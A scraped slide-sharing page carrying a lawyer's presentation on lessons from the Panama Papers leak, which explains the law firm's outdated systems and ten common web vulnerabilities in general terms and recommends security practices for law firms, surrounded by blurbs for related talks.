The document discusses lessons that can be learned from the Panama Papers data leak. It summarizes how the leak occurred due to vulnerabilities in the law firm's outdated content management and email systems. It then outlines 10 common web application vulnerabilities like injection attacks, broken authentication, and sensitive data exposure. Finally, it provides recommendations for law firms to strengthen cybersecurity, such as implementing training, monitoring systems, conducting security audits, and engaging third-party penetration testing. The key takeaway is that all law firms must prioritize data security even if they believe they are not high-value targets.
The Rise of Spear Phishing & How to Avoid being the Next HeadlinePhishLabs
Phishing is not cybercrime, phishing is the exploitation of people. In this presentation, PhishLabs walks through the problem phishing poses to businesses and how you can prepare your employees with effective security awareness training, robust intelligence and tools to fight back against the threat. Download the on-demand version of the full webinar here: https://info.phishlabs.com/the-rise-of-spear-phishinghow-to-avoid-being-the-next-headline
If you're interested in signing up for our webinar series, click here:
https://info.phishlabs.com/the-rise-of-spear-phishinghow-to-avoid-being-the-next-headline
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
This presentation contains Introduction of Phishing attack, its types and Various techniques, their impact with real live example, after that its Avoidance, Prevention and Solution. Also it contains brief introduction of SSL and HTTPS with their working.
2017 Phishing Trends & Intelligence Report: Hacking the HumanPhishLabs
PhishLabs' Phishing Trends and Intelligence annual report provides insight on significant trends, tools, and techniques used by threat actors to carry out phishing attacks. It provides context and perspective into HOW and WHY these trends are occurring
By understanding the threat, we can better defend against it. The report data is sourced from more than one million confirmed phishing sites residing across more than 170,000 unique domains. We investigated more than 7,800 phishing attacks every month, identifying the underlying infrastructure used in the attacks and shutting them down. The report uses this data to illuminate significant trends, tools, and techniques being used by the threat actors.
Do download the on-demand full webinar, click here: https://info.phishlabs.com/phishing-trends-and-intelligence-pti-report-webinar
Do download the PTI Report, click here: https://info.phishlabs.com/2017-phishing-trends-and-intelligence-report-pti
It is contain knowledge about Phishing and how it happen. It also contain knowledge about how we can prevent that. So this slide contain all the basic knowledge about phishing and anti-phishing.
The Rise of Spear Phishing & How to Avoid being the Next HeadlinePhishLabs
Phishing is not cybercrime, phishing is the exploitation of people. In this presentation, PhishLabs walks through the problem phishing poses to businesses and how you can prepare your employees with effective security awareness training, robust intelligence and tools to fight back against the threat. Download the on-demand version of the full webinar here: https://info.phishlabs.com/the-rise-of-spear-phishinghow-to-avoid-being-the-next-headline
If you're interested in signing up for our webinar series, click here:
https://info.phishlabs.com/the-rise-of-spear-phishinghow-to-avoid-being-the-next-headline
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
This presentation contains Introduction of Phishing attack, its types and Various techniques, their impact with real live example, after that its Avoidance, Prevention and Solution. Also it contains brief introduction of SSL and HTTPS with their working.
2017 Phishing Trends & Intelligence Report: Hacking the HumanPhishLabs
PhishLabs' Phishing Trends and Intelligence annual report provides insight on significant trends, tools, and techniques used by threat actors to carry out phishing attacks. It provides context and perspective into HOW and WHY these trends are occurring
By understanding the threat, we can better defend against it. The report data is sourced from more than one million confirmed phishing sites residing across more than 170,000 unique domains. We investigated more than 7,800 phishing attacks every month, identifying the underlying infrastructure used in the attacks and shutting them down. The report uses this data to illuminate significant trends, tools, and techniques being used by the threat actors.
Do download the on-demand full webinar, click here: https://info.phishlabs.com/phishing-trends-and-intelligence-pti-report-webinar
Do download the PTI Report, click here: https://info.phishlabs.com/2017-phishing-trends-and-intelligence-report-pti
It is contain knowledge about Phishing and how it happen. It also contain knowledge about how we can prevent that. So this slide contain all the basic knowledge about phishing and anti-phishing.
Phishing--The Entire Story of a Dark WorldAvishek Datta
Phishing is a common problem in today's world. I have summarized some of the essential points needed for anyone to safeguard against all known Phishing attacks.
Phishing basics: include its history
Introduction: phishing in detail
Techniques: Techniques used like link manipulation,web forgery
New phish: spear phishing
reason behind phishing
latest case study
survey: on top hosting and victim countries
Examples: popular website and email examples
Presentation by Luc de Graeve at the Gordon institute of business science in 2001.
This presentation is about security in e-commerce and is aimed at making people aware of what hackers do, how they do it and the financial implications of their actions. The presentation begins with a few examples of defaced websites and ends with a discussion on risk and assessment.
Phishing Attacks - Are You Ready to Respond?Splunk
Phishing and Spear Phishing attacks are the number one starting point for most large data breaches. But there is currently no efficient prevention technology available to mitigate this risk. Learn what capabilities organizations need to have in order to respond to phishing attacks and lower the risk.
- Learn how to detect and respond to phishing attacks
- Understand how an average user behaves when faced with a phishing attack and why they are so successful
- Get insight into the questions that you will need to answer if a phishing campaign is running against your organisation
- Learn the capabilities organisations will need to have in order to answer those questions and protect against phishing attacks
- Learn how you improve your incident response capabilities
Online Brand Protection:Fighting Domain Name Typosquatting, Website Spoofing...WhoisXML API
Your domain name represents your online identity. Its misuse and abuse can be likened to destroying your brand’s reputation. Identify some wide-spread threats that domains face, along with, a practical solution to help you keep your brand safe online.
Learn why the legal industry is such a popular target and what common mistakes can be found at most firms. You'll also discover why it's important to have a plan in case your firm falls victim to a breach.
Phishing--The Entire Story of a Dark WorldAvishek Datta
Phishing is a common problem in today's world. I have summarized some of the essential points needed for anyone to safeguard against all known Phishing attacks.
Phishing basics: include its history
Introduction: phishing in detail
Techniques: Techniques used like link manipulation,web forgery
New phish: spear phishing
reason behind phishing
latest case study
survey: on top hosting and victim countries
Examples: popular website and email examples
Presentation by Luc de Graeve at the Gordon institute of business science in 2001.
This presentation is about security in e-commerce and is aimed at making people aware of what hackers do, how they do it and the financial implications of their actions. The presentation begins with a few examples of defaced websites and ends with a discussion on risk and assessment.
Phishing Attacks - Are You Ready to Respond?Splunk
Phishing and Spear Phishing attacks are the number one starting point for most large data breaches. But there is currently no efficient prevention technology available to mitigate this risk. Learn what capabilities organizations need to have in order to respond to phishing attacks and lower the risk.
- Learn how to detect and respond to phishing attacks
- Understand how an average user behaves when faced with a phishing attack and why they are so successful
- Get insight into the questions that you will need to answer if a phishing campaign is running against your organisation
- Learn the capabilities organisations will need to have in order to answer those questions and protect against phishing attacks
- Learn how you improve your incident response capabilities
Online Brand Protection:Fighting Domain Name Typosquatting, Website Spoofing...WhoisXML API
Your domain name represents your online identity. Its misuse and abuse can be likened to destroying your brand’s reputation. Identify some wide-spread threats that domains face, along with, a practical solution to help you keep your brand safe online.
Learn why the legal industry is such a popular target and what common mistakes can be found at most firms. You'll also discover why it's important to have a plan in case your firm falls victim to a breach.
Disqualification of Prime Minister of Pakistan(Panama Papers case)Shahid Mehmood
This topic will help you to prepare about panama papers case in which Supreme Court of Pakistan disqualified the Prime Minister of Pakistan, found him guilty, involving in dishonesty and Corruption.
Panama Papers( leaks) ? The Biggest Financial leaks in History.Arslan Haider
What Panama papers,Mosack fonseca ,Offshore companies,Tax havens ,Effect on pakistan,Effect on international economy and mosack fonseca reaction on panamapapers.
Panama Papers - The Biggest Financial Leak in HistoryStinson
Heard about the Panama Paper leak but don't know what it is? Check out our quick summary for a run down of what's been going on.
Sources:
https://panamapapers.icij.org/blog/20160403-new-icij-investigation-exposes-rogue-offshore-industry.html
http://think-squad.com/post/142244482771/what-are-the-panama-papers-a-guide-to-the-biggest
http://nicaise.co.vu/post/142225824946
http://micdotcom.tumblr.com/post/142254284927/the-panama-papers-reveal-just-how-badly-the-1-is
http://mic.com/articles/139733/panama-papers-data-leak-these-are-the-11-biggest-politicians-named utm_source=policymicTBLR&utm_medium=main&utm_campaign=social#.c0eKdGslQ
https://news.vice.com/article/the-panama-papers-massive-leak-reveals-the-global-elites-secret-cash-havens
https://www.youtube.com/watch?v=F6XnH_OnpO0
MBA (IRM) students Presentation on Industrial Sector Pakistan. Being students of a reputable institution "Hailey College of Banking & Finance Punjab University"" we are thankful to our Professor Farah Naz Naqvi who sparkled our presentation skills and taught us to visualize the practical picture of the Economy.
Faraz Ishaque
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017Carol Smith
What is machine learning? Is UX relevant in the age of artificial intelligence (AI)? How can I take advantage of cognitive computing? Get answers to these questions and learn about the implications for your work in this session. Carol will help you understand at a basic level how these systems are built and what is required to get insights from them. Carol will present examples of how machine learning is already being used and explore the ethical challenges inherent in creating AI. You will walk away with an awareness of the weaknesses of AI and the knowledge of how these systems work.
10 ways to protect your e commerce site from hacking & fraudWebSitePulse
According to the Hacked Website Report by Sucuri, the number of websites getting compromised by hackers is increasing every year. The damage related to cybercrime is expected to hit $6 trillion by the end of 2020.
If you are planning to launch an eCommerce website or already running a successful one, you must have to upgrade the security of your website regularly. Here, I am sharing some useful ways to keep your eCommerce site safe from hackers and fraudsters.
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic attempting to acquire sensitive information such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication. Phishing is a fraudulent e-mail that attempts to get you to divulge personal data that can then be used for illegitimate purposes.
With the help of GCHQ and Cert-UK, we've produced this presentation on reducing the impact of normal cyber attacks. It's not meant to be an exhaustive guide on cyber security threats. The presentation isn't tailored to individual needs, and it is not a replacement for specialist cyber security advice.
The Avid Life Media hack is a striking example of everything that can go wrong when a company is completely breached followed by a total disclosure of the stolen information. This attack resulted in an estimated $200 million in costs, firing of the CEO, and countless lives ruined. This presentation will review the data exposed and what can be learned to prevent this from happening to your organization.
Ethical Hacking Concepts and Scopes, Threats and Attack Vectors, Information Assurance, Threat Modelling
Enterprise Information Security Architecture, Vulnerability
Assessment and Penetration Testing
Types of Social Engineering, Insider Attack, Preventing Insider
Threats, Social Engineering Targets and Defence Strategies
ETHICAL HACKING AND SOCIAL ENGINEERING
Topics Covered: Ethical Hacking Concepts and Scopes, Threats and Attack Vectors, Information Assurance, Threat Modelling, Enterprise Information Security Architecture, Vulnerability, Assessment and Penetration Testing, Types of Social Engineering, Insider Attack, Preventing Insider Threats, Social Engineering Targets and Defence Strategies
Info Session on Cybersecurity & Cybersecurity Study JamsGDSCCVR
In an era where digital threats are ever-evolving, understanding the fundamentals of cybersecurity is crucial.
Highlights of the Event:
💡 Google Cybersecurity Certification Scholarship.
🎭 Cloning and Phishing Demystified
🚨 Unravelling the Depths of Database Breaches
🛡️ Digital safety 101
🧼 Self-Check for Cyber Hygiene
⏺️ Event Details:
Date: 18th December 2023
Time: 6:00 PM to 7:00 PM
Venue: Online
IBM i is securable BUT not secured by default. To help protect your organization from the increasing security threats, you must take control of all access points to your IBM i server. You can limit IBM i security threats by routinely assessing your risks and taking control of logon security, powerful authorities, and system access.
With the right tools and process, you can assure comprehensive control of unauthorized access and can trace any activity, suspicious or otherwise, on your IBM i systems.
Watch this on-demand webcast to learn:
• How to secure network access and communication ports
• How to implement different authentication options and tradeoffs
• How to limit the number of privileged user accounts
• How Precisely’s Assure Security can help
Similar to Panama Papers Leak and Precautions Law firms should take (20)
Ransomware cyber crime is there any solution or prevention is better than cure.
Cyber criminals have made lucrative business and even 100$ ransom gets collected via bitcoin.
How to Obtain Permanent Residency in the NetherlandsBridgeWest.eu
You can rely on our assistance if you are ready to apply for permanent residency. Find out more at: https://immigration-netherlands.com/obtain-a-permanent-residence-permit-in-the-netherlands/.
In 2020, the Ministry of Home Affairs established a committee led by Prof. (Dr.) Ranbir Singh, former Vice Chancellor of National Law University (NLU), Delhi. This committee was tasked with reviewing the three codes of criminal law. The primary objective of the committee was to propose comprehensive reforms to the country’s criminal laws in a manner that is both principled and effective.
The committee’s focus was on ensuring the safety and security of individuals, communities, and the nation as a whole. Throughout its deliberations, the committee aimed to uphold constitutional values such as justice, dignity, and the intrinsic value of each individual. Their goal was to recommend amendments to the criminal laws that align with these values and priorities.
Subsequently, in February, the committee successfully submitted its recommendations regarding amendments to the criminal law. These recommendations are intended to serve as a foundation for enhancing the current legal framework, promoting safety and security, and upholding the constitutional principles of justice, dignity, and the inherent worth of every individual.
A "File Trademark" is a legal term referring to the registration of a unique symbol, logo, or name used to identify and distinguish products or services. This process provides legal protection, granting exclusive rights to the trademark owner, and helps prevent unauthorized use by competitors.
Visit Now: https://www.tumblr.com/trademark-quick/751620857551634432/ensure-legal-protection-file-your-trademark-with?source=share
Car Accident Injury Do I Have a Case....Knowyourright
Every year, thousands of Minnesotans are injured in car accidents. These injuries can be severe – even life-changing. Under Minnesota law, you can pursue compensation through a personal injury lawsuit.
Military Commissions details LtCol Thomas Jasper as Detailed Defense CounselThomas (Tom) Jasper
Military Commissions Trial Judiciary, Guantanamo Bay, Cuba. Notice of the Chief Defense Counsel's detailing of LtCol Thomas F. Jasper, Jr. USMC, as Detailed Defense Counsel for Abd Al Hadi Al-Iraqi on 6 August 2014 in the case of United States v. Hadi al Iraqi (10026)
Responsibilities of the office bearers while registering multi-state cooperat...Finlaw Consultancy Pvt Ltd
Introduction-
The process of register multi-state cooperative society in India is governed by the Multi-State Co-operative Societies Act, 2002. This process requires the office bearers to undertake several crucial responsibilities to ensure compliance with legal and regulatory frameworks. The key office bearers typically include the President, Secretary, and Treasurer, along with other elected members of the managing committee. Their responsibilities encompass administrative, legal, and financial duties essential for the successful registration and operation of the society.
Responsibilities of the office bearers while registering multi-state cooperat...
Panama Papers Leak and Precautions Law firms should take
1. An expose by
Lawyers ! What to learn from the
Panama Papers Leak
Adv. Prashant Mali
1Advocate Prashant Mali (www.prashantmali.com)
2. The Background
• Data breach at , a
Panamian law firm is being touted as the
largest ever, in terms of the sheer volume of
information leaked.
• The leaked information allegedly details the
ways dozens of high-ranking politicians, their
relatives or close associates in more than 50
countries, including U.K., France, Russia, China
and India, have used offshore companies to
hide income and avoid paying taxes.
2Advocate Prashant Mali (www.prashantmali.com)
3. The Numbers
• Reportedly cover 11.5 million confidential
documents dating from 1970s to late 2015.
• The 2.6 terabytes of leaked data
includes:
4.8 million emails
3 million database files
2.2 million PDFs
1.1 million images
320,000 text documents
3Advocate Prashant Mali (www.prashantmali.com)
4. How did the Leak happen?
• The leak stems from an email hack
• An email server attack could have happened
in multiple ways
• The firm’s client portal found vulnerable to
the DROWN vulnerability, which was using
the old, deprecated SSLv2 encryption
protocol on servers
4Advocate Prashant
Mali
5. How did the Leak happen?
• Portal was using the open source Drupal
Content Management System (CMS) which was
outdated and not updated since two years.
• This outdated CMS version on the portal was
vulnerable to SQL injection which generally,
responsible for 97% of the data breaches across
the world.
• Other application layer vulnerabilities on the
portal were Cross Site Scripting, Cross Sight
Request Forgery, and Brute Force Bypass, etc.
5Advocate Prashant Mali (www.prashantmali.com)
6. How did the Leak happen?
• Security researchers have claimed that certain
backend portions of the site were also accessible
with simple commands that any high school
hacker could have guessed.
• Even the Microsoft’s Outlook at Mossack Fonseca
was last updated seven years back in 2009.
• The emails were not even encrypted which made
incredibly easy for hackers to get admin level
privileges with such application and system level
security standards
6Advocate Prashant Mali (www.prashantmali.com)
7. 1. Injection
• It happens when account login page does not
filter user inputs correctly.
• Hackers can use commands to enter through this
and claim legitimate access.
• Moreover, they can use anything from sign-in forms
to comments box and send commands to the server.
• Business risk: Hackers have direct way of
interacting with the server
• They can steal data, change it, delete it, deny access
and do much more!
• In fact, injection attacks such as SQL Injection are
allegedly responsible for major data breaches at
Ashley Madison and Sony
7Advocate Prashant Mali (www.prashantmali.com)
8. 2. Broken Authentication & Session
Management
• Negligence in customer accounts, password
recovery and even sessions can lead to
increased security risks
• Essential to have high degree of control over
account log-in using unique user ID and password
• Business risk: Hackers are allowed to claim
complete account access.
• In severe cases, stolen database records are sold to
underground black market
8Advocate Prashant Mali (www.prashantmali.com)
9. 3. Cross-site Scripting
• The most common vulnerability – with this weakness,
attackers could use web applications to send malicious
script to a user’s browser
• Poses threat to both, users and website
• Hackers basically intercept communication between server &
browser to inject malicious codes at both ends.
• Cross-Site Scripting not only harms the website but also
allows attacks to redirect users to any other URL
• Business risk: Hackers can change the homepage of the
website, inject malware on the site
• Usually leads to websites getting blocked by search engines and
browsers!
9Advocate Prashant
Mali
10. 4. Insecure Direct Object References
• This vulnerability can be seen when we simply
change a few numbers in URL and press enter
and thereby allowed to access unprivileged data
because the numbers were predictable
• Multiple predictable patterns that will allow hackers
to get into database and access restricted data
• Business risk: An attacker can access and
expose a lot of data
• Security is compromised, although, he cannot make
many changes
10Advocate Prashant
Mali
11. 5. Security Misconfiguration
• Misconfigured security is a tough vulnerability to
handle as it takes into account all security lapses at
every level of the application
• Most system admins ignore changing their passwords
or even disabling ports and accounts they do not use
anymore
• Attackers look for such small lapses, combine them, and
try to make something big out of it
• Business risk: Can lead to complete loss of data
through alteration, deletion and theft
• Attackers can use one vulnerability after the other to
access the database
11Advocate Prashant
Mali
12. 6. Sensitive Data Exposure
• Data should be stored or transmitted only by
encrypting it with cryptographic algorithms
• It ensures that even if the passwords or credit card
details are stolen, hackers cannot do anything with it
• Critical to keep the data encrypted in such a way that
only authorized keys or algorithms unlock it
• Business risk: Loss of sensitive data, passwords,
credit card information, addresses and bank
statements
• May have serious repercussions on credibility
12Advocate Prashant Mali (www.prashantmali.com)
13. 7. Missing Function Level Access
Control
• Admin function controls are the most
important ones and should be restricted
• Most companies do not bother reassuring that
only authorized accounts access privileged
information.
• Business risk: Once the attacker gains admin
access, he can change a lot things including
application data and settings
• Serious tangible and intangible consequences
and loss of credibility
13Advocate Prashant Mali (www.prashantmali.com)
14. 8. Cross-Site Request Forgery (CSRF)
• It is the case of malicious link hidden in an
image on the random website that is visited
by the customer
• Fraudsters alter the URL for the customer to
initiate a command that the customer doesn’t
even know about
• Business risk: There would be random
requests, purchases, and money transfers
• One could never be sure about its genuinity and
customers will gradually lose trust in the website
14Advocate Prashant Mali (www.prashantmali.com)
15. 9. Using Components with Known
Vulnerabilities
• Sometimes application developers use open
source projects with unknown loopholes like
unknown application codes
• Business risk: Unknown application codes
brings unknown risks
• Cross-site scripting, injection risks and business
logic loopholes are just some of the examples
• Such vulnerability brings data breach, access
control, defacements and theft risks
15Advocate Prashant Mali (www.prashantmali.com)
16. 10. Invalidated Redirects and
Forwards
• Customer is taken to a website which looks exactly like
the one he wants, but, it is not the same! Fraudsters
can get the information needed through it
• Most websites don’t even know about such unauthorized
redirects that look genuine
• Customers should be more careful about phishing.
However, its not possible for a customer to know whether
he is redirected to a wrong website or not. Onus is on
website owner!
• Business risk: Attackers can install malware or access
user accounts with phishing
• Customers lose trust in attacked website forever
16Advocate Prashant Mali (www.prashantmali.com)
17. Solutions for such Attacks
• A complete web application security solution is needed – to
detect, protect and monitor various attacks
• Total Application Security (TAS) is industry’s integrated web
application security and compliance solution
• It helps organizations to detect application layer vulnerabilities
accurately, patch them instantly without any change in code, and
continuously monitor for emerging threats and DDoS attacks to
mitigate them
• TAS does this accurately with web application scanning (detect),
patches them instantly with web application firewall (protect), and
monitors traffic continuously for emerging threats and DDoS
attacks (monitor)
• Also includes 24x7 managed service support to perform pen testing,
create custom rules, and maintain zero false positives
17Advocate Prashant Mali (www.prashantmali.com)
18. Ensure Data Security at your Law firm
• Up to now, the only entities that seemed concerned with data
security were large corporations and health care organizations
• With reports of security breaches making headline news on a weekly
basis, data security has become top-of-mind for every business and
for every person who carries and uses a credit card
• The threat of a data breach attack is a risk for law firms, too
• The threat is reason enough to enact more stringent security
policies, but there is another compelling reason: the security
requirements of your own clients
• Small law firms might think that they are not a target, but even they
have clients with desirable data. It could even be that your law firm is
a much easier target than a corporate entity
• It’s a problem law firms cannot ignore, no matter their size
18Advocate Prashant Mali (www.prashantmali.com)
19. What can Law firms of any size
do to better manage
Cyber security ?
19Advocate Prashant Mali (www.prashantmali.com)
20. Control Chaos
• If you need to make changes to security, the changes should be
implemented in a way that does not impede attorney’s abilities to
perform work for clients.
• Your firm should balance the need to protect client data and the need
to access it.
• Consider the remediation steps for preventing the Crypto-Locker
virus. You can lock down the firm’s firewalls, desktops and email,
but if done in an overly aggressive manner the changes could have
potentially negative side effects such as users cannot upload to
court websites; one-off application like those common for litigation,
may fail; email scanning false positives caused missed email, etc.
• With planning, training, proper advance notification and staggering
the change among users, the side effects can be minimized.
20Advocate Prashant
Mali
21. Prepare, Plan and Train
• Disruptions in productivity can be avoided through careful technology
selection, planning and preparation.
• These days, maintaining a current firewall is not enough protection. Select the
most appropriate security systems that provide the best mix of ease of use
and security
• Implement new systems and procedures only after they are vetted and tested
by a small group of users
• Prepare new users by giving them advance notice and creating a training plan
that covers the topics in a language they understand.
• Security awareness training is designed to increase end user’s awareness
of the firm’s security policies and potential threats to the firm, and to
increase their willingness to adhere to the firm’s security requirements.
• It is probably the most important step to preventing incidents, such as the
Crypto-Locker virus that has infected numerous law firms in the last few
months.
21Advocate Prashant
Mali
22. You should plan to cover
• Electronic communications
• Incident reporting
• Internet access
• Mobile device security
• Password policies
• Remote access
• Social media use
• The firm’s Acceptable Use Policy
• Visitor policies
• Wireless access security
22Advocate Prashant Mali (www.prashantmali.com)
23. Verify Your Vendors
• Your firm’s vendors must also follow proper
security protocols
• Vendors, especially those hosting your data
in the cloud, need to pay particular attention
to securing and protecting your data
• Review every vendor’s commitment to
protecting your data, as well as their security
certifications and policies
23Advocate Prashant Mali (www.prashantmali.com)
24. Monitor Your Systems
• Every firm should employ top-notch antivirus, antispam, malware and
intrusion detection
• Manage these critical systems to ensure that protection is active (e.g., not
disabled by the end users) and up to date
• Routinely check firewall logs. These will highlight the extent to which your
users are under attack and make you aware of administrative access and
changes to your firewall
• Periodically check the firewall configuration for unwanted changes.
• You also should manage and monitor user accounts and scan for user
accounts that have not been accessed for a period of time, stale passwords
and membership in administrative groups
• Every IT administrator has added users to high-level security groups,
such as domain administrators, in order to test and troubleshoot issues
only to accidentally leave them in groups where they do not belong.
24Advocate Prashant
Mali
25. Make System Entry Difficult
• Law firms of all sizes should be using two-factor
authentication
• Two-factor authentication requires two things from a
user before they are allowed to access a system:
something the user has and something the user
knows
• The item the user has is a token, either a physical
token or an application on a smartphone
• The thing the user knows is his password or PIN
• Together, these items provide a significant
increase in the security of systems accessed
remotely.
25Advocate Prashant Mali (www.prashantmali.com)
26. Prioritize Physical Security
• Physical security is also important
• Server room doors and cabinets should be locked when possible
• You also may want to consider investing in an affordable security
camera system that includes options for recording physical access.
• Stored data should be encrypted
• Consider implementing a clean-and-clear desk policy, which
requires everyone to log off of their computers when not using
them and to lock computers when they walk away
• The policy should extend to laptops and other data storage
devices, which should be locked when the employee is not present
• No data, either printed or electronic, should be left unattended
26Advocate Prashant Mali (www.prashantmali.com)
27. Engage 3rd Party for Security Audits
• After you’ve determined your new policies, put
new systems and protections in place and
trained your end users, you should consider
bringing in a third party
• Someone not regularly involved with the firm’s day-
to-day IT needs to perform a security analysis
• An outside security expert will perform a top-
down evaluation of your systems, security
policies and practices, and will review physical
access to the systems
27Advocate Prashant Mali (www.prashantmali.com)
28. Try to Break In
• A penetration test is the process of trying to
break into a system in order to identify any
vulnerability
• A pen test has to be executed with care, because if it
is performed recklessly it can cause system or
network damage through buffer overflows, Denial of
Service (DoS) attacks and misconfiguration of systems
• Strive to repeat pen tests at least annually or
with more frequency
• If you change your firewall or other major systems
throughout the year, you should repeat a pen test
28Advocate Prashant Mali (www.prashantmali.com)
29. Remediate Carefully
• At the end of a security audit or pen test, you
will receive a remediation plan
• The IT department should carefully review the
recommended changes before implementation to
consider any possible adverse effects on other
systems and end users
• Some believe that threats are irrelevant for
small firms, but nothing could be further from
the truth!
• It is increasingly common for clients of law firms to
dictate security requirements, so all firms should
make strengthening security policies a top priority
29Advocate Prashant Mali (www.prashantmali.com)
30. THANK YOU
ADV. PRASHANT MALI
Email: cyberlawconsulting@gmail.com
Web site: www.prashantmali.com
Twitter : @CyberMahaGuru
30Advocate Prashant Mali (www.prashantmali.com)